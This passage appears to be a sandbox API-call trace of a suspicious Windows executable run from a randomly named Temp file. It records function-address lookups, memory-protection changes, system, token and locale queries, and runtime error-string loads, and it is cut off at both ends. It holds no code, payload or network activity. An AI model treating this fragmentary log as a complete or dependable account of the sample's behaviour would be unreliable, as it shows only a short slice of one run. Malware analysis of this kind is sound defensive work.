(hModule=0x76910000, lpProcName="HeapAlloc") returned 0x77282dd6 [0174.876] GetProcAddress (hModule=0x76910000, lpProcName="GetVersionExW") returned 0x76953b1a [0174.876] GetProcAddress (hModule=0x76910000, lpProcName="GetTickCount") returned 0x7695ba60 [0174.876] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadTimes") returned 0x76945bfd [0174.876] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadPriority") returned 0x76959147 [0174.876] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadLocale") returned 0x7695153c [0174.876] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemTimes") returned 0x7696d83a [0174.876] GetProcAddress (hModule=0x76910000, lpProcName="GetStdHandle") returned 0x76961e46 [0174.876] GetProcAddress (hModule=0x76910000, lpProcName="GetShortPathNameW") returned 0x76950bbc [0174.876] GetProcAddress (hModule=0x76910000, lpProcName="GetProcessTimes") returned 0x7694f626 [0174.876] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0174.876] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0174.877] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameW") returned 0x76963c26 [0174.877] GetProcAddress (hModule=0x76910000, lpProcName="GetLocaleInfoW") returned 0x76966596 [0174.877] GetProcAddress (hModule=0x76910000, lpProcName="GetLocalTime") returned 0x7695a90e [0174.877] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0174.877] GetProcAddress (hModule=0x76910000, lpProcName="GetFullPathNameW") returned 0x76964543 [0174.877] GetProcAddress (hModule=0x76910000, lpProcName="GetFileAttributesW") returned 0x769664ff [0174.877] GetProcAddress (hModule=0x76910000, lpProcName="GetExitCodeThread") returned 0x76946ddd [0174.877] GetProcAddress (hModule=0x76910000, lpProcName="GetDriveTypeW") returned 0x76963be6 [0174.877] GetProcAddress (hModule=0x76910000, lpProcName="GetDiskFreeSpaceW") returned 0x76943530 [0174.877] GetProcAddress (hModule=0x76910000, lpProcName="GetDateFormatW") returned 0x7695afab [0174.877] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThreadId") returned 0x7695bb80 [0174.877] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThread") returned 0x76963351 [0174.877] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentProcessId") returned 0x7695cac4 [0174.878] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentProcess") returned 0x7695cdcf [0174.878] GetProcAddress (hModule=0x76910000, lpProcName="GetComputerNameA") returned 0x76946ba9 [0174.878] GetProcAddress (hModule=0x76910000, lpProcName="GetCPInfoExW") returned 0x76948b1b [0174.878] GetProcAddress (hModule=0x76910000, lpProcName="GetCPInfo") returned 0x76961e2e [0174.878] GetProcAddress (hModule=0x76910000, lpProcName="GetACP") returned 0x769639aa [0174.878] GetProcAddress (hModule=0x76910000, lpProcName="FreeResource") returned 0x7694f1bd [0174.878] GetProcAddress (hModule=0x76910000, lpProcName="InterlockedCompareExchange") returned 0x7695bb92 [0174.878] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0174.878] GetProcAddress (hModule=0x76910000, lpProcName="FormatMessageW") returned 0x769554a3 [0174.878] GetProcAddress (hModule=0x76910000, lpProcName="FindResourceW") returned 0x76953e61 [0174.878] GetProcAddress (hModule=0x76910000, lpProcName="FindNextFileW") returned 0x7695963a [0174.878] GetProcAddress (hModule=0x76910000, lpProcName="FindFirstFileW") returned 0x769653b2 [0174.878] GetProcAddress (hModule=0x76910000, lpProcName="FindClose") returned 0x76960e62 [0174.878] GetProcAddress (hModule=0x76910000, lpProcName="ExpandEnvironmentStringsW") returned 0x76954680 [0174.878] GetProcAddress (hModule=0x76910000, lpProcName="EnumSystemLocalesW") returned 0x7699f3df [0174.878] GetProcAddress (hModule=0x76910000, lpProcName="EnumCalendarInfoW") returned 0x7699f38f [0174.878] GetProcAddress (hModule=0x76910000, lpProcName="EnterCriticalSection") returned 0x772777a0 [0174.878] GetProcAddress (hModule=0x76910000, lpProcName="DeleteFileW") returned 0x76950f62 [0174.878] GetProcAddress (hModule=0x76910000, lpProcName="DeleteCriticalSection") returned 0x77289ac5 [0174.878] GetProcAddress (hModule=0x76910000, lpProcName="CreateProcessW") returned 0x7691204d [0174.879] GetProcAddress (hModule=0x76910000, lpProcName="CreateMutexW") returned 0x76952aee [0174.879] GetProcAddress (hModule=0x76910000, lpProcName="CreateFileW") returned 0x7695cc56 [0174.879] GetProcAddress (hModule=0x76910000, lpProcName="CreateEventW") returned 0x76963386 [0174.879] GetProcAddress (hModule=0x76910000, lpProcName="CreateDirectoryW") returned 0x76953925 [0174.879] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileW") returned 0x769467c3 [0174.879] GetProcAddress (hModule=0x76910000, lpProcName="CompareStringW") returned 0x76959bee [0174.879] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0174.879] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0174.879] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0174.879] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0174.879] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0174.879] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0174.879] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAlloc") returned 0x76962fb6 [0174.879] GetProcAddress (hModule=0x76910000, lpProcName="lstrlenW") returned 0x7695d9e8 [0174.879] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQuery") returned 0x769676d6 [0174.879] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceCounter") returned 0x7695bb9f [0174.879] GetProcAddress (hModule=0x76910000, lpProcName="GetTickCount") returned 0x7695ba60 [0174.879] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemInfo") returned 0x76963728 [0174.879] GetProcAddress (hModule=0x76910000, lpProcName="GetVersion") returned 0x7695154e [0174.879] GetProcAddress (hModule=0x76910000, lpProcName="CompareStringW") returned 0x76959bee [0174.880] GetProcAddress (hModule=0x76910000, lpProcName="IsValidLocale") returned 0x76953de4 [0174.880] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadLocale") returned 0x769788e6 [0174.880] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemDefaultUILanguage") returned 0x7694731d [0174.880] GetProcAddress (hModule=0x76910000, lpProcName="GetUserDefaultUILanguage") returned 0x769522ef [0174.880] GetProcAddress (hModule=0x76910000, lpProcName="GetLocaleInfoW") returned 0x76966596 [0174.880] GetProcAddress (hModule=0x76910000, lpProcName="WideCharToMultiByte") returned 0x7696450e [0174.880] GetProcAddress (hModule=0x76910000, lpProcName="MultiByteToWideChar") returned 0x7696452b [0174.880] GetProcAddress (hModule=0x76910000, lpProcName="GetACP") returned 0x769639aa [0174.880] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryExW") returned 0x76954775 [0174.880] GetProcAddress (hModule=0x76910000, lpProcName="GetStartupInfoW") returned 0x76963891 [0174.880] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0174.880] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0174.880] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameW") returned 0x76963c26 [0174.880] GetProcAddress (hModule=0x76910000, lpProcName="GetCommandLineW") returned 0x7696679e [0174.880] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0174.880] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0174.880] GetProcAddress (hModule=0x76910000, lpProcName="UnhandledExceptionFilter") returned 0x7696ed38 [0174.880] GetProcAddress (hModule=0x76910000, lpProcName="RtlUnwind") returned 0x76947f70 [0174.880] GetProcAddress (hModule=0x76910000, lpProcName="RaiseException") returned 0x7694eb60 [0174.880] GetProcAddress (hModule=0x76910000, lpProcName="ExitProcess") returned 0x7696214f [0174.881] GetProcAddress (hModule=0x76910000, lpProcName="ExitThread") returned 0x7725f611 [0174.881] GetProcAddress (hModule=0x76910000, lpProcName="SwitchToThread") returned 0x7694eb24 [0174.881] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThreadId") returned 0x7695bb80 [0174.881] GetProcAddress (hModule=0x76910000, lpProcName="CreateThread") returned 0x7696375d [0174.881] GetProcAddress (hModule=0x76910000, lpProcName="DeleteCriticalSection") returned 0x77289ac5 [0174.881] GetProcAddress (hModule=0x76910000, lpProcName="LeaveCriticalSection") returned 0x77277760 [0174.881] GetProcAddress (hModule=0x76910000, lpProcName="EnterCriticalSection") returned 0x772777a0 [0174.881] GetProcAddress (hModule=0x76910000, lpProcName="InitializeCriticalSection") returned 0x7728a149 [0174.882] GetProcAddress (hModule=0x76910000, lpProcName="FindFirstFileW") returned 0x769653b2 [0174.882] GetProcAddress (hModule=0x76910000, lpProcName="FindClose") returned 0x76960e62 [0174.882] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0174.882] GetProcAddress (hModule=0x76910000, lpProcName="GetStdHandle") returned 0x76961e46 [0174.882] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0174.882] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0174.882] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0174.882] GetProcAddress (hModule=0x76910000, lpProcName="RaiseException") returned 0x7694eb60 [0174.882] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryA") returned 0x7696395c [0174.882] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0174.882] GetProcAddress (hModule=0x76910000, lpProcName="TlsSetValue") returned 0x7695da88 [0174.882] GetProcAddress (hModule=0x76910000, lpProcName="TlsGetValue") returned 0x7695da70 [0174.882] GetProcAddress (hModule=0x76910000, lpProcName="LocalFree") returned 0x7695ca64 [0174.882] GetProcAddress (hModule=0x76910000, lpProcName="LocalAlloc") returned 0x76963363 [0174.882] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0174.882] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0174.884] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0174.884] GetProcAddress (hModule=0x769f0000, lpProcName="OpenThreadToken") returned 0x76a0432c [0174.884] GetProcAddress (hModule=0x769f0000, lpProcName="OpenProcessToken") returned 0x76a04304 [0174.884] GetProcAddress (hModule=0x769f0000, lpProcName="GetUserNameA") returned 0x76a1a4b4 [0174.897] GetProcAddress (hModule=0x769f0000, lpProcName="GetTokenInformation") returned 0x76a0431c [0174.897] GetProcAddress (hModule=0x769f0000, lpProcName="GetSidSubAuthorityCount") returned 0x76a00e0c [0174.897] GetProcAddress (hModule=0x769f0000, lpProcName="GetSidSubAuthority") returned 0x76a00e24 [0174.897] GetProcAddress (hModule=0x769f0000, lpProcName="FreeSid") returned 0x76a0412e [0174.897] GetProcAddress (hModule=0x769f0000, lpProcName="EqualSid") returned 0x76a0410b [0174.897] GetProcAddress (hModule=0x769f0000, lpProcName="AllocateAndInitializeSid") returned 0x76a040e6 [0174.897] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0174.897] GetProcAddress (hModule=0x769f0000, lpProcName="RegQueryValueExW") returned 0x76a046ad [0174.897] GetProcAddress (hModule=0x769f0000, lpProcName="RegOpenKeyExW") returned 0x76a0468d [0174.897] GetProcAddress (hModule=0x769f0000, lpProcName="RegCloseKey") returned 0x76a0469d [0174.897] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0174.897] GetProcAddress (hModule=0x769f0000, lpProcName="CryptGenRandom") returned 0x769fdfc8 [0174.897] GetProcAddress (hModule=0x769f0000, lpProcName="CryptReleaseContext") returned 0x769fe124 [0174.897] GetProcAddress (hModule=0x769f0000, lpProcName="CryptAcquireContextW") returned 0x769fdf14 [0174.897] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x76750000 [0174.898] GetProcAddress (hModule=0x76750000, lpProcName="CoTaskMemFree") returned 0x767a6f41 [0174.898] GetProcAddress (hModule=0x76750000, lpProcName="StringFromCLSID") returned 0x7676eb17 [0174.898] GetProcAddress (hModule=0x76750000, lpProcName="CoCreateInstance") returned 0x76799d0b [0174.898] GetProcAddress (hModule=0x76750000, lpProcName="CoUninitialize") returned 0x767986d3 [0174.898] GetProcAddress (hModule=0x76750000, lpProcName="CoInitialize") returned 0x7676b636 [0174.898] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0174.898] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayPtrOfIndex") returned 0x76c2e1ce [0174.898] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayGetUBound") returned 0x76c2e127 [0174.898] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayGetLBound") returned 0x76c2e173 [0174.898] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayCreate") returned 0x76c2e263 [0174.898] GetProcAddress (hModule=0x76c10000, lpProcName="VariantChangeType") returned 0x76c15dee [0174.898] GetProcAddress (hModule=0x76c10000, lpProcName="VariantCopy") returned 0x76c148f1 [0174.898] GetProcAddress (hModule=0x76c10000, lpProcName="VariantClear") returned 0x76c13eae [0174.898] GetProcAddress (hModule=0x76c10000, lpProcName="VariantInit") returned 0x76c13ed5 [0174.898] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0174.898] GetProcAddress (hModule=0x76c10000, lpProcName="GetErrorInfo") returned 0x76c13f21 [0174.899] GetProcAddress (hModule=0x76c10000, lpProcName="SysFreeString") returned 0x76c13e59 [0174.899] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0174.899] GetProcAddress (hModule=0x76c10000, lpProcName="SysFreeString") returned 0x76c13e59 [0174.899] GetProcAddress (hModule=0x76c10000, lpProcName="SysReAllocStringLen") returned 0x76c17810 [0174.899] GetProcAddress (hModule=0x76c10000, lpProcName="SysAllocStringLen") returned 0x76c145d2 [0174.899] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75830000 [0174.899] GetProcAddress (hModule=0x75830000, lpProcName="SHGetSpecialFolderPathW") returned 0x75850468 [0174.899] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76b40000 [0174.899] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxA") returned 0x76b9ea11 [0174.899] GetProcAddress (hModule=0x76b40000, lpProcName="CharNextW") returned 0x76b50be6 [0174.899] GetProcAddress (hModule=0x76b40000, lpProcName="LoadStringW") returned 0x76b4dfba [0174.899] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76b40000 [0174.899] GetProcAddress (hModule=0x76b40000, lpProcName="PeekMessageW") returned 0x76b5634a [0174.899] GetProcAddress (hModule=0x76b40000, lpProcName="MsgWaitForMultipleObjects") returned 0x76b537d8 [0174.899] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxW") returned 0x76b9ea5f [0174.899] GetProcAddress (hModule=0x76b40000, lpProcName="LoadStringW") returned 0x76b4dfba [0174.900] GetProcAddress (hModule=0x76b40000, lpProcName="GetSystemMetrics") returned 0x76b567cf [0174.900] GetProcAddress (hModule=0x76b40000, lpProcName="CharUpperBuffW") returned 0x76b5ebd5 [0174.900] GetProcAddress (hModule=0x76b40000, lpProcName="CharUpperW") returned 0x76b5e981 [0174.900] GetProcAddress (hModule=0x76b40000, lpProcName="CharLowerBuffW") returned 0x76b53afe [0174.900] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x12ff68 | out: lpflOldProtect=0x12ff68*=0x40) returned 1 [0174.900] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x12ff68 | out: lpflOldProtect=0x12ff68*=0x4) returned 1 [0174.900] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0174.900] SetThreadLocale (Locale=0x400) returned 1 [0174.901] GetVersion () returned 0x1db10106 [0174.901] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0174.901] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadPreferredUILanguages") returned 0x769522d7 [0174.901] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0174.901] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadPreferredUILanguages") returned 0x7694e627 [0174.901] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0174.901] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadUILanguage") returned 0x7694ae42 [0174.901] GetSystemInfo (in: lpSystemInfo=0x12fc34 | out: lpSystemInfo=0x12fc34*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0174.901] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"100_OK\" \"60000\"" [0174.901] GetStartupInfoW (in: lpStartupInfo=0x12fc10 | out: lpStartupInfo=0x12fc10*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4, hStdOutput=0x200202, hStdError=0x1f80)) [0174.901] GetACP () returned 0x4e4 [0174.901] GetCurrentThreadId () returned 0x728 [0174.901] GetVersion () returned 0x1db10106 [0174.901] GetVersionExW (in: lpVersionInformation=0x12fb44*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x7728f879, dwMinorVersion=0x7728f99a, dwBuildNumber=0x2b1ca8, dwPlatformId=0x12fbaa, szCSDVersion="") | out: lpVersionInformation=0x12fb44*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0174.902] GetModuleFileNameW (in: hModule=0x400000, lpFilename=0x12da00, nSize=0x20a | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\wspgagwn.exe")) returned 0x30 [0174.902] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12d7ea, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\wspgagwn.exe")) returned 0x30 [0174.902] VirtualAlloc (lpAddress=0x0, dwSize=0x13fff0, flAllocationType=0x1000, flProtect=0x4) returned 0x1300000 [0174.902] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0174.902] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0174.902] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0174.902] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0174.902] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0174.902] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0174.902] GetUserDefaultUILanguage () returned 0x409 [0174.904] IsValidLocale (Locale=0x409, dwFlags=0x2) returned 1 [0174.904] GetThreadUILanguage () returned 0x120409 [0174.904] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12d768 | out: pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12d768) returned 1 [0174.904] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x142a680, pcchLanguagesBuffer=0x12d768 | out: pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x142a680, pcchLanguagesBuffer=0x12d768) returned 1 [0174.904] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.en-US", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0174.904] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.en", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0174.905] GetUserDefaultUILanguage () returned 0x409 [0174.905] GetLocaleInfoW (in: Locale=0x409, LCType=0x3, lpLCData=0x12d784, cchData=4 | out: lpLCData="ENU") returned 4 [0174.905] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.ENU", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0174.905] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.EN", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0174.905] LoadStringW (in: hInstance=0x400000, uID=0xffc7, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Method called on disposed object") returned 0x20 [0174.906] LoadStringW (in: hInstance=0x400000, uID=0xffc6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Feature not implemented") returned 0x17 [0174.906] LoadStringW (in: hInstance=0x400000, uID=0xffc5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Monitor support function not initialized") returned 0x28 [0174.906] LoadStringW (in: hInstance=0x400000, uID=0xffc4, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Object lock not owned") returned 0x15 [0174.906] LoadStringW (in: hInstance=0x400000, uID=0xffc3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Exception in safecall method") returned 0x1c [0174.906] LoadStringW (in: hInstance=0x400000, uID=0xffc2, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Interface not supported") returned 0x17 [0174.906] LoadStringW (in: hInstance=0x400000, uID=0xffc0, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="External exception %x") returned 0x15 [0174.906] LoadStringW (in: hInstance=0x400000, uID=0xffc1, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Assertion failed") returned 0x10 [0174.906] LoadStringW (in: hInstance=0x400000, uID=0xffd3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0174.906] LoadStringW (in: hInstance=0x400000, uID=0xffdc, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid argument") returned 0x10 [0174.906] LoadStringW (in: hInstance=0x400000, uID=0xffd2, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0174.906] LoadStringW (in: hInstance=0x400000, uID=0xffed, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Variant method calls not supported") returned 0x22 [0174.906] LoadStringW (in: hInstance=0x400000, uID=0xffd6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid variant operation") returned 0x19 [0174.906] LoadStringW (in: hInstance=0x400000, uID=0xffd5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0174.906] LoadStringW (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Stack overflow") returned 0xe [0174.906] LoadStringW (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Control-C hit") returned 0xd [0174.906] LoadStringW (in: hInstance=0x400000, uID=0xffe8, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Privileged instruction") returned 0x16 [0174.906] LoadStringW (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Access violation") returned 0x10 [0174.906] LoadStringW (in: hInstance=0x400000, uID=0xffe3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid class typecast") returned 0x16 [0174.906] LoadStringW (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point underflow") returned 0x18 [0174.906] LoadStringW (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point overflow") returned 0x17 [0174.906] LoadStringW (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point division by zero") returned 0x1f [0174.906] LoadStringW (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0174.906] LoadStringW (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Integer overflow") returned 0x10 [0174.906] LoadStringW (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Range check error") returned 0x11 [0174.906] LoadStringW (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Division by zero") returned 0x10 [0174.907] LoadStringW (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0x12dc2c, cchBufferMax=4096 | out: lpBuffer="Out of memory") returned 0xd [0174.907] LoadStringW (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x12dc2c, cchBufferMax=4096 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0174.907] GetVersionExW (in: lpVersionInformation=0x12fb40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12fb40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0174.907] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76910000 [0174.907] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x2c4438 [0174.907] GetProcAddress (hModule=0x76910000, lpProcName="GetNativeSystemInfo") returned 0x7694be77 [0174.907] GetNativeSystemInfo (in: lpSystemInfo=0x12fb1c | out: lpSystemInfo=0x12fb1c*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0174.907] LoadStringW (in: hInstance=0x400000, uID=0xff68, lpBuffer=0x12db00, cchBufferMax=4096 | out: lpBuffer="Windows") returned 0x7 [0174.907] LoadStringW (in: hInstance=0x400000, uID=0xff6b, lpBuffer=0x12db00, cchBufferMax=4096 | out: lpBuffer="Windows 7") returned 0x9 [0174.907] LoadStringW (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Invalid numeric input") returned 0x15 [0174.907] LoadStringW (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Disk full") returned 0x9 [0174.907] LoadStringW (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Read beyond end of file") returned 0x17 [0174.907] LoadStringW (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="File access denied") returned 0x12 [0174.907] LoadStringW (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Too many open files") returned 0x13 [0174.907] LoadStringW (in: hInstance=0x400000, uID=0xff85, lpBuffer=0x12dc24, 